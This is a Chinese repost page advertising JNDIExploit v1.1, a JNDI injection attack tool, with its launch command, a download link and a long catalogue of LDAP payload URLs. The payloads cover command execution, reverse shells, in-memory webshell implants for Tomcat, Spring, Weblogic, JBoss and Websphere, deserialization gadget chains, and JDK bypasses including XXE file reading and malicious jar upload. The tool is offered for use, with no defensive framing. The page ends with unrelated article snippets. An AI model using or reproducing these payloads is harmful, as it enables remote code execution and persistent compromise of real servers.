【JNDI注入利用工具】JNDIExploit v1.1

# 簡介

JNDIExploit一款用于?JNDI注入?利用的工具,大量參考/引用了?Rogue JNDI?項目的代碼,集成了JDNI注入格式,能夠更加方便的開啟服務端后直接利用,支持反彈Shell命令執行、直接植入內存shell等,并集成了常見的bypass 高版本JDK的方式,適用于與自動化工具配合使用。

詳細使用文檔:JNDIExploit/README.md

# 相關截圖

圖片[1] - 【JNDI注入利用工具】JNDIExploit v1.1 - 極核GetShell

# 快速使用

##服務端

快速開啟JNDIExploit服務端,默認開啟LDAP服務1389端口HTTP服務3456端口,綁定<出口IP>

建議使用JDK8開啟此服務,否則可能出現利用LDAP時服務端報錯。

java -jar JNDIExploit-1.3-SNAPSHOT.jar -i <你的出口IP>

##客戶端(注入端)

服務端輸入命令java -jar JNDIExploit-1.3-SNAPSHOT.jar -u查看支持的JNDI注入格式,或者查看以下列表

Supported LADP Queries

* all words are case INSENSITIVE when send to ldap server

[+] Basic Queries: ldap://127.0.0.1:1389/Basic/[PayloadType]/[Params], e.g.

ldap://127.0.0.1:1389/Basic/Dnslog/[domain]

ldap://127.0.0.1:1389/Basic/Command/[cmd]

ldap://127.0.0.1:1389/Basic/Command/Base64/[base64_encoded_cmd]

ldap://127.0.0.1:1389/Basic/ReverseShell/[ip]/[port] ---windows NOT supported

ldap://127.0.0.1:1389/Basic/TomcatEcho

ldap://127.0.0.1:1389/Basic/SpringEcho

ldap://127.0.0.1:1389/Basic/WeblogicEcho

ldap://127.0.0.1:1389/Basic/TomcatMemshell1

ldap://127.0.0.1:1389/Basic/TomcatMemshell2 ---need extra header [Shell: true]

ldap://127.0.0.1:1389/Basic/JettyMemshell

ldap://127.0.0.1:1389/Basic/WeblogicMemshell1

ldap://127.0.0.1:1389/Basic/WeblogicMemshell2

ldap://127.0.0.1:1389/Basic/JBossMemshell

ldap://127.0.0.1:1389/Basic/WebsphereMemshell

ldap://127.0.0.1:1389/Basic/SpringMemshell

[+] Deserialize Queries: ldap://127.0.0.1:1389/Deserialization/[GadgetType]/[PayloadType]/[Params], e.g.

ldap://127.0.0.1:1389/Deserialization/URLDNS/[domain]

ldap://127.0.0.1:1389/Deserialization/CommonsCollectionsK1/Dnslog/[domain]

ldap://127.0.0.1:1389/Deserialization/CommonsCollectionsK2/Command/Base64/[base64_encoded_cmd]

ldap://127.0.0.1:1389/Deserialization/CommonsBeanutils1/ReverseShell/[ip]/[port] ---windows NOT supported

ldap://127.0.0.1:1389/Deserialization/CommonsBeanutils2/TomcatEcho

ldap://127.0.0.1:1389/Deserialization/C3P0/SpringEcho

ldap://127.0.0.1:1389/Deserialization/Jdk7u21/WeblogicEcho

ldap://127.0.0.1:1389/Deserialization/Jre8u20/TomcatMemshell1

ldap://127.0.0.1:1389/Deserialization/CVE_2020_2555/WeblogicMemshell1

ldap://127.0.0.1:1389/Deserialization/CVE_2020_2883/WeblogicMemshell2 ---ALSO support other memshells

[+] TomcatBypass Queries

ldap://127.0.0.1:1389/TomcatBypass/Dnslog/[domain]

ldap://127.0.0.1:1389/TomcatBypass/Command/[cmd]

ldap://127.0.0.1:1389/TomcatBypass/Command/Base64/[base64_encoded_cmd]

ldap://127.0.0.1:1389/TomcatBypass/ReverseShell/[ip]/[port] ---windows NOT supported

ldap://127.0.0.1:1389/TomcatBypass/TomcatEcho

ldap://127.0.0.1:1389/TomcatBypass/SpringEcho

ldap://127.0.0.1:1389/TomcatBypass/TomcatMemshell1

ldap://127.0.0.1:1389/TomcatBypass/TomcatMemshell2 ---need extra header [Shell: true]

ldap://127.0.0.1:1389/TomcatBypass/SpringMemshell

[+] GroovyBypass Queries

ldap://127.0.0.1:1389/GroovyBypass/Command/[cmd]

ldap://127.0.0.1:1389/GroovyBypass/Command/Base64/[base64_encoded_cmd]

[+] WebsphereBypass Queries

ldap://127.0.0.1:1389/WebsphereBypass/List/file=[file or directory]

ldap://127.0.0.1:1389/WebsphereBypass/Upload/Dnslog/[domain]

ldap://127.0.0.1:1389/WebsphereBypass/Upload/Command/[cmd]

ldap://127.0.0.1:1389/WebsphereBypass/Upload/Command/Base64/[base64_encoded_cmd]

ldap://127.0.0.1:1389/WebsphereBypass/Upload/ReverseShell/[ip]/[port] ---windows NOT supported

ldap://127.0.0.1:1389/WebsphereBypass/Upload/WebsphereMemshell

ldap://127.0.0.1:1389/WebsphereBypass/RCE/path=[uploaded_jar_path] ----e.g: ../../../../../tmp/jar_cache7808167489549525095.tmp

  • 目前支持的所有?PayloadType?為
    • Dnslog: 用于產生一個DNS請求,與?DNSLog平臺配合使用,對Linux/Windows進行了簡單的適配
    • Command: 用于執行命令,如果命令有特殊字符,支持對命令進行?Base64編碼后傳輸
    • ReverseShell: 用于?Linux?系統的反彈shell,方便使用
    • TomcatEcho: 用于在中間件為?Tomcat?時命令執行結果的回顯,通過添加自定義header?cmd: whoami?的方式傳遞想要執行的命令
    • SpringEcho: 用于在框架為?SpringMVC/SpringBoot?時命令執行結果的回顯,通過添加自定義header?cmd: whoami?的方式傳遞想要執行的命令
    • WeblogicEcho: 用于在中間件為?Weblogic?時命令執行結果的回顯,通過添加自定義header?cmd: whoami?的方式傳遞想要執行的命令
    • TomcatMemshell1: 用于植入Tomcat內存shell, 支持Behinder shell?與?Basic cmd shell
    • TomcatMemshell2: 用于植入Tomcat內存shell, 支持Behinder shell?與?Basic cmd shell, 使用時需要添加額外的HTTP Header?Shell: true,?推薦使用此方式
    • SpringMemshell: 用于植入Spring內存shell, 支持Behinder shell?與?Basic cmd shell
    • WeblogicMemshell1: 用于植入Weblogic內存shell, 支持Behinder shell?與?Basic cmd shell
    • WeblogicMemshell2: 用于植入Weblogic內存shell, 支持Behinder shell?與?Basic cmd shell推薦使用此方式
    • JettyMemshell: 用于植入Jetty內存shell, 支持Behinder shell?與?Basic cmd shell
    • JBossMemshell: 用于植入JBoss內存shell, 支持Behinder shell?與?Basic cmd shell
    • WebsphereMemshell: 用于植入Websphere內存shell, 支持Behinder shell?與?Basic cmd shell
  • 目前支持的所有?GadgetType?為
    • URLDNS
    • CommonsBeanutils1
    • CommonsBeanutils2
    • CommonsCollectionsK1
    • CommonsCollectionsK2
    • C3P0
    • Jdk7u21
    • Jre8u20
    • CVE_2020_2551
    • CVE_2020_2883
  • WebsphereBypass?中的 3 個動作:
    • list:基于XXE查看目標服務器上的目錄或文件內容
    • upload:基于XXEjar協議將惡意jar包上傳至目標服務器的臨時目錄

# 下載

恭喜你發現寶藏站點哦,不妨點進去看看,絕對不會后悔的!

【JNDI注入利用工具】JNDIExploit v1.1 - 極核GetShell (get-shell.com)icon-default.png?t=N7T8https://get-shell.com/4004.html

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/diannao/40473.shtml
繁體地址,請注明出處:http://hk.pswp.cn/diannao/40473.shtml
英文地址,請注明出處:http://en.pswp.cn/diannao/40473.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

7.4、空指針和野指針

空指針 #include <iostream> using namespace std;int main() {//空指針//1、空指針用于給變量進行初始化int * p NULL;//2、空指針是不可以進行訪問的//0-255之間的內存編號是系統占用的&#xff0c;因此不可以訪問//cout<<*p<<endl;system("pause&q…

算法訓練 | 圖論Part3 | 101.孤島的總面積、102.沉沒孤島、103.水流問題、104.建造最大島嶼

目錄 101.孤島的總面積 圖論法 102.沉沒孤島 圖論法 103.水流問題 圖論法 104.建造最大島嶼 圖論法 101.孤島的總面積 題目鏈接&#xff1a;101. 孤島的總面積 文章講解&#xff1a;代碼隨想錄 圖論法 代碼一&#xff1a;深搜 #include <iostream> #includ…

在Centos7上安裝PostgreSQL16的詳細步驟

文章目錄 環境一、準備二、postgresql下載方法一&#xff1a;wget下載方法二&#xff1a;下載壓縮包解壓 三、創建用戶組、用戶四、創建數據主目錄五、配置環境變量六、initdb初使化數據庫七、配置服務八、設置開機自啟動九、設置防火墻十、啟動數據庫服務 環境 CPU: 4 核心或以…

Python爬蟲系列-讓爬蟲自己寫爬蟲(半自動化,代替人工寫爬蟲)

現在的PC、手機客戶端等終端設備大量使用了網頁前后端技術&#xff0c;另外主流的網站也會經常會更新&#xff0c;導致以前一個月更新一次爬蟲代碼&#xff0c;變成了天天需要更新代碼&#xff0c;所以自動化爬蟲技術在當前就顯得特別重要&#xff0c;最近我也是在多次更新某個…

養老院生活管理系統

摘要 隨著全球范圍內人口老齡化趨勢的日益加劇&#xff0c;養老院作為老年人生活的重要場所&#xff0c;其生活管理問題也顯得愈發突出和重要。為了滿足養老院在日常生活管理、老人健康監護、服務人員管理等多方面的需求&#xff0c;提高管理效率和服務質量。決定設計并實現了…

用一百場線下講座科普充電樁 能效電氣做到了

在新能源汽車產業蓬勃發展的今天,充電樁作為產業鏈的重要環節,其建設與發展成為推動行業進步的關鍵。在這一背景下,能效電氣憑借其卓越的技術實力和前瞻性的市場布局,成為了新能源充電樁行業的佼佼者。 為了進一步推動新能源產業的發展,普及充電樁知識,能效電氣精心策劃并舉辦…

C語言數據類型和變量(二)

目錄 1.數據類型的取值范圍 2.變量 2.1 變量的創建 2.2 變量的分類 2.3全局變量和局部變量在內存中的存儲?編輯 3. 算術操作符&#xff1a; 、 - 、* 、/ 、% 3.1 和 - 3.2 * 3.3 / 3.4 % 1.數據類型的取值范圍 每一種數據類型有自己的取值范圍&#xff0c;也就是存…

mapper.xml 文件對應的 Dao 接口原理

在 Java 框架如 MyBatis 中&#xff0c;Mapper.xml 文件是用于定義 SQL 查詢的配置文件&#xff0c;而對應的 Dao 接口&#xff08;Mapper 接口&#xff09;則提供了與 XML 文件中的 SQL 查詢相對應的方法。這種設計模式使得 Java 代碼與 SQL 語句解耦&#xff0c;提高了代碼的…

盤點亞馬遜5大實用選品思路(圖文講解+選品案例)

一、7天藍海選品法 市場上很多工具一般都是近30天的跨境商品數據&#xff0c;而店雷達亞馬遜選品&#xff0c;可以篩選出上架近7天的亞馬遜產品&#xff0c;避免在已經市場相對飽和的賽道&#xff0c;中小賣家還要擠破頭去搶蛋糕。我們更應該學會在市場反饋好的新品中找到出單…

Git刪除了文件拉取時失敗

本地刪除了一些文件&#xff0c;遠端的另一個提交修改了被刪除的文件&#xff0c;vs里拉取時提示未處理的提交&#xff0c;無法繼續操作&#xff0c;git gui里顯示很多unstaged change的項 解決辦法&#xff1a; 1、用git bash的git rm --cached filename或 git rm -r --cached…

GBASE8S如何使用dbexport實現單表的還原和實現數據庫的復制

(一) 通過dbexport實現單表數據還原 1. 測試前的信息查看 本次以test庫的表test21為例 [gbasedbtiZ2ze5s78e4tanwe5q2znxZ ~]$ dbaccess test - Your evaluation license will expire on 2025-05-26 00:00:00Database selected.> select * from test21;id name1 a2 b3 c3…

探索Vue.js的無限可能 —— vuejs-challenges

vuejs-challenges&#xff1a;挑戰自我&#xff0c;共同成長&#xff0c;Vue.js挑戰等你來戰&#xff01;- 精選真開源&#xff0c;釋放新價值。 概覽 vuejs-challenges是一個專為Vue.js學習者和開發者設計的開源項目。它通過提供一系列精心設計的挑戰&#xff0c;幫助參與者深…

使用 JavaScriptCore 進行跨語言調用

使用 JavaScriptCore 進行跨語言調用時&#xff0c;既可以在 Native 代碼中執行 JavaScript 代碼&#xff0c;也可以在 JavaScript 中調用 Native 方法。以下是詳細的實現步驟和示例。 1. 在 Native 代碼中執行 JavaScript 代碼 使用 JavaScriptCore 框架&#xff0c;可以在 …

手把手教你一步一步通過AI助手生成利潤表分析報告

AI助手之利潤表分析報告-操作篇 以下為文字整理部分&#xff1a; 如果要手工制作一份這樣的利潤分析報告大概要多久時間&#xff1f;從準備數據做成表格&#xff0c;到完成報告&#xff0c;至少需要1天的時間吧&#xff0c;特別是敲文字報告的時候&#xff0c;生怕把數字搞錯要…

什么是森林防火氣象站?作用?

森林防火氣象站用精準的數據和先進的技術&#xff0c;守護著森林的安全。本文將帶您了解其重要性、工作原理以及在森林防火中的實際應用。 一、森林防火氣象站的重要性 森林火災是森林生態系統的大敵&#xff0c;它能在短時間內燒毀大片森林&#xff0c;破壞生態平衡&#xff0…

5、Redis 緩存設計相關知識點

1. 多級緩存架構 多級緩存架構是一種通過在應用層和數據庫層之間添加多個緩存層來提高系統性能和可用性的架構設計。這種設計能夠有效減少數據庫負載,并提高數據訪問速度。常見的多級緩存包括本地緩存、分布式緩存和數據庫緩存。 本地緩存:本地緩存位于應用服務器本地,響應…

高通平臺Display顯示架構

目錄 一、顯示整體架構二、SurfaceFlinger三、HWC四、Gralloc五、DisplayManagerService六、WindowManagerService 一、顯示整體架構 二、SurfaceFlinger SurfaceFlinger是一個系統服務&#xff0c;如&#xff1a;audioflinger等等&#xff0c;這個系統服務主要實現了Surface的…

通過升級nginx完美修復nginx相關漏洞

目錄 前言1 安全評估報告的漏洞信息1.1 nginx漏洞概況1.2 nginx漏洞詳細信息1.3 安裝的軟件信息 2 問題分析3 Nginx從1.18版本升級到1.26版本的步驟與說明3.1 查看現有Nginx配置參數3.2 下載新版本Nginx3.3 配置新版本Nginx3.4 編譯新版本Nginx3.5 備份舊版本Nginx的二進制文件…

github 設置中文,親測有效

點進去 安裝 選上面第二個&#xff0c;不行再選第一個 GitHub - maboloshi/github-chinese: GitHub 漢化插件&#xff0c;GitHub 中文化界面。 (GitHub Translation To Chinese)

常見網絡攻擊方式及防御方法

1. DDOS攻擊&#xff08;分布式拒絕服務攻擊&#xff09; 概念&#xff1a;借助于C/S&#xff08;客戶端/服務器&#xff09;技術&#xff0c;將多個計算機聯合起來作為攻擊平臺&#xff0c;對一個或多個目標發動DDOS攻擊&#xff0c;從而成倍地提高拒絕服務攻擊的威力。防護方…